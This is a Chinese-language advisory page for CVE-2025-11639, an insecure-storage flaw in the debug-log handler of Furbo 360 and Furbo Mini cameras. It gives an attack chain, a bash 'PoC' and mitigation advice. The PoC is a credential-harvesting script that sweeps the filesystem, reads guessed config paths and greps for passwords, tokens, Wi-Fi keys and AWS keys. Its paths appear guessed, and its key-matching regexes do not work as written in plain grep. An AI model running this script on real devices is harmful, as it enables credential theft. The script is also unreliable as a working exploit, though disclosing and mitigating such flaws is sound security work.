CVE-2025-11639：Tomofun Furbo设备敏感信息不安全存储漏洞

漏洞信息

漏洞编号

CVE-2025-11639

漏洞类型

敏感信息不安全存储

CVSS评分

3.3 低危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Tomofun Furbo 360 和 Furbo Mini

漏洞概述

CVE-2025-11639是Tomofun公司旗下Furbo 360和Furbo Mini智能宠物摄像头设备中存在的一个敏感信息不安全存储漏洞。该漏洞位于设备固件的collect_logs.sh脚本文件中，属于Debug Log S3 Bucket Handler（调试日志S3存储桶处理程序）组件的一部分。由于该组件在处理调试日志时未对敏感信息进行适当的加密或安全保护，导致敏感数据以不安全的方式进行存储。

根据CVSS 3.1评分标准，该漏洞评分为3.3分，属于低危级别。攻击者需要以本地方式发起攻击，且需要低权限账户即可利用。该漏洞主要影响机密性（C:L），对完整性和可用性无影响。

受影响的固件版本包括Furbo 360的FB0035_FW_036及以下版本，以及Furbo Mini的MC0020_FW_074及以下版本。Tomofun作为厂商在漏洞披露前已被联系，但未对披露做出任何回应，这增加了用户面临安全风险的可能性。该漏洞已于2025年10月12日被公开披露，由[email protected]发现并报告。

技术细节

该漏洞的核心问题在于collect_logs.sh脚本中Debug Log S3 Bucket Handler组件对敏感信息的存储方式存在安全缺陷。具体而言，调试日志收集脚本在将日志数据上传到AWS S3存储桶或本地存储时，未对其中包含的敏感信息（如设备凭证、用户认证令牌、Wi-Fi密码或其他隐私数据）进行加密处理或访问控制。

从技术层面分析，攻击者需要具备本地访问权限（AV:L）和低权限账户（PR:L）即可利用此漏洞。攻击者可以通过以下方式利用该漏洞：

1. 首先，攻击者通过本地手段（如物理访问设备、通过其他漏洞获取shell权限等）获得设备的低权限访问权限。
2. 然后，攻击者定位到collect_logs.sh脚本及其生成的调试日志文件，这些文件可能存储在设备的临时目录或固定路径下。
3. 由于日志中包含的敏感信息未经过加密或混淆处理，攻击者可以直接读取这些明文数据，获取其中的敏感信息。
4. 获取的敏感信息可能被用于进一步的攻击，如冒充用户身份、访问云端服务、或进行其他恶意活动。

该漏洞不需要用户交互（UI:N），攻击复杂度较低（AC:L），且对系统的完整性和可用性无影响，仅造成机密性信息的泄露。

攻击链分析

STEP 1

步骤1：获取本地访问权限

攻击者通过物理接触设备、利用其他已知漏洞或默认凭证等方式，获得Furbo设备的本地低权限shell访问权限。

STEP 2

步骤2：定位调试日志文件

攻击者在设备文件系统中搜索collect_logs.sh脚本生成的调试日志文件，这些文件通常存储在/tmp、/var/log或设备特定的目录中。

STEP 3

步骤3：读取明文敏感信息

由于调试日志中的敏感信息未经过加密处理，攻击者直接读取日志文件，获取其中包含的设备凭证、API密钥、Wi-Fi密码等敏感数据。

STEP 4

步骤4：利用泄露的凭证

攻击者使用获取的敏感信息（如AWS S3凭证）访问云端存储桶，获取更多用户数据，或使用Wi-Fi密码接入用户网络进行进一步攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# CVE-2025-11639 PoC - Insecure Storage of Sensitive Information
# Vulnerability: Debug Log S3 Bucket Handler in collect_logs.sh
# Affected: Tomofun Furbo 360 (<= FB0035_FW_036) and Furbo Mini (<= MC0020_FW_074)

# Step 1: Gain local low-privilege access to the Furbo device
# This could be through physical access, SSH, or other local vectors
echo "[*] Establishing local access to Furbo device..."

# Step 2: Locate the debug log files generated by collect_logs.sh
echo "[*] Searching for debug log files..."
find / -name "*.log" -path "*furbo*" 2>/dev/null
find / -name "collect_logs*" 2>/dev/null
find /tmp -type f 2>/dev/null
find /var/log -type f 2>/dev/null

# Step 3: Examine the debug log contents for sensitive information
echo "[*] Extracting sensitive information from debug logs..."
LOG_FILES=$(find / -name "*.log" -path "*debug*" 2>/dev/null)

for log_file in $LOG_FILES; do
    echo "[*] Analyzing: $log_file"
    # Look for credentials, tokens, API keys
    grep -i "password\|token\|api_key\|secret\|credential\|aws_access\|wifi\|ssid" "$log_file"
    # Look for S3 bucket configuration
    grep -i "s3\|bucket\|aws" "$log_file"
done

# Step 4: Check S3 bucket handler configuration
echo "[*] Checking S3 bucket handler configuration..."
cat /etc/furbo/s3_config* 2>/dev/null
cat /opt/furbo/config/* 2>/dev/null

# Step 5: Extract any hardcoded credentials or sensitive data
echo "[*] Extracted sensitive data:"
grep -r "AKIA[0-9A-Z]{16}" /tmp/ /var/log/ 2>/dev/null  # AWS Access Key IDs
grep -r "[0-9a-zA-Z/+]{40}" /tmp/ /var/log/ 2>/dev/null   # AWS Secret Keys

echo "[*] PoC execution complete - sensitive information exposed"

影响范围

Furbo 360 <= FB0035_FW_036

Furbo Mini <= MC0020_FW_074

防御指南

临时缓解措施

由于Tomofun厂商未对漏洞披露做出回应，建议用户采取以下临时缓解措施：1）限制Furbo设备的物理访问权限，将其放置在受控环境中；2）定期检查并清理设备上的调试日志文件；3）修改设备关联的Wi-Fi网络密码，防止凭证泄露后被利用；4）监控AWS账户中与Furbo设备关联的S3存储桶访问日志，发现异常访问及时处理；5）考虑使用网络隔离措施，将IoT设备放置在独立的VLAN或网络中；6）关注Tomofun官方发布的安全更新公告，及时更新固件。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-11639
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-11639
3 Details https://www.cvedetails.com/cve/CVE-2025-11639/
4 VulDB https://vuldb.com/cve/CVE-2025-11639
5 Link https://vuldb.com/?ctiid.328050
6 Link https://vuldb.com/?id.328050
7 Link https://vuldb.com/?submit.661364
8 Link https://vuldb.com/?submit.661876
9 Link https://vuldb.com/?submit.661876